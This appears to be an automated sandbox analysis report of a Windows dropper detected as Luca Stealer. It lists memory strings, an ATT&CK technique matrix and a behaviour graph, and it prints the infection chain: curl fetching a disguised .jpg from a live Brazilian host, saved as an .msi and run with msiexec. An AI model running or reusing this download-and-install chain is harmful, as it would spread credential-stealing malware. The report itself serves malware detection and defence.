Base7364Average Workflow Persist Time7366Average Workflow Persist Time Base8154Terminal Services8156Active Sessions8158Inactive Sessions8160Total Sessions5200Hyper-V Hypervisor Logical Processor5202Global Time5204Total Run Time5206Hypervisor Run Time5208Hardware Interrupts/sec5210Context Switches/sec5212Inter-Processor Interrupts/sec5214Scheduler Interrupts/sec5216Timer Interrupts/sec
        Source: UIServices.exe, 00000039.00000003.452156375.0000018E5ACFA000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.456053891.0000018E5880C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.454503254.0000018E5880C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Virtual Machine Bus Provider PipesU
        Source: UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider Pipes
        Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Virtual ProcessorZy
        Source: UIServices.exe, 00000039.00000002.455383437.000000806CD4A000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: VMWare
        Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.452049067.0000018E5AC90000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455972358.0000018E587A2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Logical Processor
        Source: UIServices.exe, 00000027.00000002.342496999.0000029C1C513000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336526672.0000029C1EAB2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V umvqqnfqcihjvfn Bus Provider PipesX`
        Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlluu2
        Source: UIServices.exe, 0000002F.00000003.379294802.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.379026905.0000027DB6E13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: r-Processor Interrupts Sent/sec5220Processor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Cost5366IO Instructions/sec5368IO Instructions Cost5370HLT Instructions/sec5372HLT Instructions Cost5374MWAIT Instructions/sec5376MWAIT Instructions Cost5378CPUID Instructions/sec5380CPUID Instructions Cost5382MSR Accesses/sec5384MSR Accesses Cost5386Other Intercepts/sec5388Other Intercepts Cost5390External Interrupts/sec5392External Interrupts Cost5394Pending Interrupts/sec5396Pending Interrupts Cost5398Emulated Instructions/sec5400Emulated Instructions Cost5402Debug Register Accesses/sec5404Debug Register Accesses Cost5406Page Fault Intercepts/sec5408Page Fault Intercepts Cost5410Guest Page Table Maps/sec5412Large Page TLB Fills/sec5414Small Page TLB Fills/sec5416Reflected Guest Page Faults/sec5418APIC MMIO Accesses/sec5420IO Intercept Messages/sec5422Memory Intercept Messages/sec5424APIC EOI Accesses/sec5426Other Messages/sec5428Page Table Allocations/sec5430Logical Processor Migrations/sec5432Address Space Evictions/sec5434Address Space Switches/sec5436Address Domain Flushes/sec5438Address Space Flushes/sec5440Global GVA Range Flushes/sec5442Local Flushed GVA Ranges/sec5444Page Tabl
        Source: UIServices.exe, 00000027.00000003.336409090.0000029C1EA67000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000003.336480991.0000029C1EA9D000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342452343.0000029C1C4FE000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000027.00000002.342323734.0000029C1C4C8000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401570207.0000027DB505C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.390667733.0000027DB737C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor
        Source: UIServices.exe, 0000002F.00000003.392418292.0000027DB7399000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401663607.0000027DB5079000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service'o
        Source: UIServices.exe, 0000002F.00000003.390521901.0000027DB7348000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401468831.0000027DB5028000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Hypervisor Root Partition&
        Source: UIServices.exe, 00000039.00000003.437101679.0000018E5A644000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: cessor Halts/sec5222Monitor Transition Cost5224Context Switch Time5226C1 Transitions/sec5228% C1 Time5230C2 Transitions/sec5232% C2 Time5234C3 Transitions/sec5236% C3 Time5238Frequency5240% of Max Frequency5242Parking Status5244Processor State Flags5246Root Vp Index5248Idle Sequence Number5250Global TSC Count5252Active TSC Count5254Idle Accumulation5256Reference Cycle Count 05258Actual Cycle Count 05260Reference Cycle Count 15262Actual Cycle Count 15264Proximity Domain Id5266Posted Interrupt Notifications/sec5268Guest Run Time5270Idle Time5272% Total Run Time5274% Hypervisor Run Time5276% Guest Run Time5278% Idle Time5280Total Interrupts/sec5182Hyper-V Hypervisor5184Logical Processors5186Partitions5188Total Pages5190Virtual Processors5192Monitored Notifications5194Modern Standby Entries5196Platform Idle Transitions5198HypervisorStartupCost5282Hyper-V Hypervisor Root Partition5284Virtual Processors5286Virtual TLB Pages5288Address Spaces5290Deposited Pages5292GPA Pages5294GPA Space Modifications/sec5296Virtual TLB Flush Entires/sec5298Recommended Virtual TLB Size53004K GPA pages53022M GPA pages53041G GPA pages5306512G GPA pages53084K device pages53102M device pages53121G device pages5314512G device pages5316Attached Devices5318Device Interrupt Mappings5320I/O TLB Flushes/sec5322I/O TLB Flush Cost5324Device Interrupt Errors5326Device DMA Errors5328Device Interrupt Throttle Events5330Skipped Timer Ticks5332Partition Id5334Nested TLB Size5336Recommended Nested TLB Size5338Nested TLB Free List Size5340Nested TLB Trimmed Pages/sec5342I/O TLB Flushes Base5344Hyper-V Hypervisor Root Virtual Processor5346Total Run Time5348Hypervisor Run Time5350Remote Node Run Time5352Normalized Run Time5354Hypercalls/sec5356Hypercalls Cost5358Page Invalidations/sec5360Page Invalidations Cost5362Control Register Accesses/sec5364Control Register Accesses Costm
        Source: curl.exe, 0000000A.00000003.257252677.000001840CB50000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllhh
        Source: UIServices.exe, 0000002F.00000003.400158471.0000027DB50DD000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.392469286.0000027DB7400000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.401720587.0000027DB50E0000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000002.455899726.0000018E5878C000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.451949537.0000018E5AC7A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V umvqqnfqcihjvfn Bus
        Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exeCode function: 39_2_00007FFC2356F75C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00007FFC2356F75C
        Source: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exeCode function: 47_2_00007FFC23C6F75C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,47_2_00007FFC23C6F75C
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.DropperX-gen.15394.30671.dll",#1Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msiJump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\curl.exe curl http://anydesk10.hospedagemdesites.ws/UIServices.jpg -o C:\Users\user\AppData\Local\Temp\spclwow78x.msi
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi" Jump to behavior
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\AppData\Local\Temp\spclwow78x.msi"
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)HIGHJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* filesJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\UIServices.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\." /SETINTEGRITYLEVEL (CI)(OI)LOWJump to behavior
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)HIGH
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\expand.exe "C:\Windows\system32\EXPAND.EXE" -R files.cab -F:* files
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\UIServices.exe"
        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\icacls.exe "C:\Windows\system32\ICACLS.EXE" "C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\." /SETINTEGRITYLEVEL (CI)(OI)LOW
        Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
        Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd&
        Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWndba
        Source: UIServices.exe, 00000027.00000003.339453471.0000029C1E7A5000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000003.382230873.0000027DB72EB000.00000004.00000020.00020000.00000000.sdmp, UIServices.exe, 00000039.00000003.440966542.0000018E5AAEB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd7
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\UIServices.exeCode function: 39_2_00007FF79738C110 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,39_2_00007FF79738C110

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: UIServices.exe PID: 3560, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: UIServices.exe PID: 5736, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: UIServices.exe PID: 3928, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: UIServices.exe PID: 3560, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: UIServices.exe PID: 5736, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: UIServices.exe PID: 3928, type: MEMORYSTR
        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        1
        Replication Through Removable Media
        1
        Windows Management Instrumentation
        1
        Services File Permissions Weakness
        12
        Process Injection
        2
        Masquerading
        OS Credential Dumping1
        System Time Discovery
        1
        Replication Through Removable Media
        11
        Archive Collected Data
        Exfiltration Over Other Network Medium1
        Encrypted Channel
        Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/Job1
        DLL Side-Loading
        1
        Services File Permissions Weakness
        1
        Disable or Modify Tools
        LSASS Memory11
        Security Software Discovery
        Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
        Ingress Tool Transfer
        Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)1
        DLL Side-Loading
        11
        Virtualization/Sandbox Evasion
        Security Account Manager2
        Process Discovery
        SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration2
        Non-Application Layer Protocol
        Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
        Process Injection
        NTDS11
        Virtualization/Sandbox Evasion
        Distributed Component Object ModelInput CaptureScheduled Transfer2
        Application Layer Protocol
        SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
        Services File Permissions Weakness
        LSA Secrets11
        Peripheral Device Discovery
        SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.common1
        Rundll32
        Cached Domain Credentials1
        Remote System Discovery
        VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup Items1
        DLL Side-Loading
        DCSync2
        File and Directory Discovery
        Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
        File Deletion
        Proc Filesystem13
        System Information Discovery
        Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 756307 Sample: SecuriteInfo.com.Win64.Drop... Startdate: 30/11/2022 Architecture: WINDOWS Score: 52 109 Yara detected Luca Stealer 2->109 9 msiexec.exe 7 37 2->9         started        12 loaddll64.exe 1 2->12         started        process3 file4 95 C:\Windows\Installer\MSIECF4.tmp, PE32 9->95 dropped 97 C:\Windows\Installer\MSIC14D.tmp, PE32 9->97 dropped 99 C:\Windows\Installer\MSI931A.tmp, PE32 9->99 dropped 101 3 other files (none is malicious) 9->101 dropped 14 msiexec.exe 5 9->14         started        16 msiexec.exe 5 9->16         started        18 msiexec.exe 9->18         started        20 cmd.exe 1 12->20         started        22 rundll32.exe 12->22         started        24 rundll32.exe 12->24         started        26 conhost.exe 12->26         started        process5 process6 28 UIServices.exe 14->28         started        38 3 other processes 14->38 32 UIServices.exe 16->32         started        41 3 other processes 16->41 34 UIServices.exe 18->34         started        43 3 other processes 18->43 36 rundll32.exe 20->36         started        45 2 other processes 22->45 47 2 other processes 24->47 dnsIp7 107 192.168.2.1 unknown unknown 28->107 111 Queries memory information (via WMI often done to detect virtual machines) 28->111 49 cmd.exe 36->49         started        51 cmd.exe 36->51         started        77 C:\Users\user\...\UIServices.exe (copy), PE32+ 38->77 dropped 91 3 other files (none is malicious) 38->91 dropped 58 3 other processes 38->58 79 C:\Users\user\...\UIServices.exe (copy), PE32+ 41->79 dropped 81 C:\Users\user\...\vcruntime140.dll (copy), PE32+ 41->81 dropped 83 C:\...\30833088ae6bfb4abc107567083083c9.tmp, PE32+ 41->83 dropped 85 C:\...\0eae52cd25d2e54183e98bebd14ba490.tmp, PE32+ 41->85 dropped 60 3 other processes 41->60 87 C:\Users\user\...\UIServices.exe (copy), PE32+ 43->87 dropped 89 C:\Users\user\...\vcruntime140.dll (copy), PE32+ 43->89 dropped 93 2 other files (none is malicious) 43->93 dropped 62 3 other processes 43->62 53 curl.exe 2 45->53         started        64 3 other processes 45->64 56 curl.exe 1 47->56         started        66 3 other processes 47->66 file8 signatures9 process10 dnsIp11 68 curl.exe 1 49->68         started        71 conhost.exe 49->71         started        73 msiexec.exe 6 51->73         started        75 conhost.exe 51->75         started        105 anydesk10.hospedagemdesites.ws 191.252.51.12, 49697, 49698, 49699 LocawebServicosdeInternetSABR Brazil 53->105 process12 dnsIp13 103 anydesk10.hospedagemdesites.ws 68->103

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        No Antivirus matches
        SourceDetectionScannerLabelLink
        C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\537a39cd2c1b400e9f1169024b13d68d$dpx$.tmp\29b46379382ed74d83879371e86987c8.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\MW-41c173f9-8798-494b-aa19-9db46f28a6d1\files\vcruntime140.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\c52dbbfefebf4f3e88ce36e5881f78eb$dpx$.tmp\fcfd202f570ae346b7d75b811246e386.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\MW-44114562-6760-4a4c-97c1-6b4491c709b3\files\vcruntime140.dll (copy)0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\1305f6fe679b4fa294331bb6eb899bc4$dpx$.tmp\30833088ae6bfb4abc107567083083c9.tmp0%ReversingLabs
        C:\Users\user\AppData\Local\Temp\MW-83846a6a-5335-49c7-a64d-3215771defa9\files\vcruntime140.dll (copy)0%ReversingLabs
        C:\Windows\Installer\MSI1F4D.tmp0%ReversingLabs
        C:\Windows\Installer\MSI24FC.tmp0%ReversingLabs
        C:\Windows\Installer\MSI8CB0.tmp0%ReversingLabs
        C:\Windows\Installer\MSI931A.tmp0%ReversingLabs
        C:\Windows\Installer\MSIC14D.tmp0%ReversingLabs
        C:\Windows\Installer\MSIECF4.tmp0%ReversingLabs
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        https://curl.se/docs/http-cookies.html0%URL Reputationsafe
        https://curl.se/docs/http-cookies.html0%URL Reputationsafe
        https://discord.com/0%URL Reputationsafe
        https://curl.se/docs/alt-svc.html0%URL Reputationsafe
        https://curl.se/docs/hsts.html0%URL Reputationsafe
        http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006e00610076000%URL Reputationsafe
        http://canonicalizer.ucsuri.tcs/680074007400700073003a002f002f00700069006e0067002e002e006300680065000%URL Reputationsafe
        https://discord.com/api/v10/gatewayhttps://discord.com/api/v10/gateway/bot0%Avira URL Cloudsafe
        https://discord.com/api/v10/guildshttps://discord.com/api/v10/invites/0%Avira URL Cloudsafe
        https://discord.com/api/v10/voice/regionshttps://discord.com/api/v10/webhooks/0%Avira URL Cloudsafe
        https://discord.com/api/v10/users/0%Avira URL Cloudsafe
        https://discord.com/api/v10/guildshttps://discord.com/api/v10/invites/0%VirustotalBrowse
        https://discord.com/api/v10/gatewayhttps://discord.com/api/v10/gateway/bot0%VirustotalBrowse
        https://discord.com/api/v10/voice/regionshttps://discord.com/api/v10/webhooks/0%VirustotalBrowse
        https://discord.com/api/v10/users/0%VirustotalBrowse
        https://discord.com/api/v10/guilds/iconbannerjoined_atstring0%Avira URL Cloudsafe
        https://discord.com/api/v10/interactions//callback0%Avira URL Cloudsafe
        http://ipwhois.app/json/0%Avira URL Cloudsafe
        https://discord.com/api/v10/oauth2/applications/0%Avira URL Cloudsafe
        https://discord.com/DDiscordBot0%Avira URL Cloudsafe
        https://status.discord.com/api/v2/incidents/unresolved.jsonhttps://status.discord.com/api/v2/schedul0%Avira URL Cloudsafe
        https://freegeoip.app/json/X0%Avira URL Cloudsafe
        https://discord.com/api/v10/channels/0%Avira URL Cloudsafe
        https://discord.com/api/v10/sticker-packshttps://discord.com/api/v10/users/0%Avira URL Cloudsafe
        https://freegeoip.app/json/0%Avira URL Cloudsafe
        https://discord.com/api/v10/applications//commands/0%Avira URL Cloudsafe
        https://discord.com/api/v10/stage-instanceshttps://discord.com/api/v10/stage-instances/0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        anydesk10.hospedagemdesites.ws
        191.252.51.12
        truefalse
          high
          NameMaliciousAntivirus DetectionReputation
          http://anydesk10.hospedagemdesites.ws/UIServices.jpgfalse
            high
            NameSourceMaliciousAntivirus DetectionReputation
            https://discord.com/api/v10/users/0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
            • 0%, Virustotal, Browse
            • Avira URL Cloud: safe
            unknown
            https://api.telegram.org/bot0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
              high
              https://curl.se/docs/http-cookies.htmlexpand.exe, 00000025.00000003.305367004.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000027.00000000.317730806.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, UIServices.exe, 00000027.00000002.345564874.00007FF797397000.00000002.00000001.01000000.00000008.sdmp, expand.exe, 0000002D.00000003.365194463.00000000052A8000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 0000002F.00000002.404088890.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, UIServices.exe, 0000002F.00000000.370608731.00007FF6FC357000.00000002.00000001.01000000.0000000A.sdmp, expand.exe, 00000035.00000003.418147088.0000000004EAC000.00000004.00000800.00020000.00000000.sdmp, UIServices.exe, 00000039.00000000.423539099.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, UIServices.exe, 00000039.00000002.458020680.00007FF643397000.00000002.00000001.01000000.0000000C.sdmp, 0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://discord.com/api/v10/gatewayhttps://discord.com/api/v10/gateway/bot0eae52cd25d2e54183e98bebd14ba490.tmp.37.drfalse
              • 0%, Virustotal, Browse
              • Avira URL Cloud: safe
              unknown
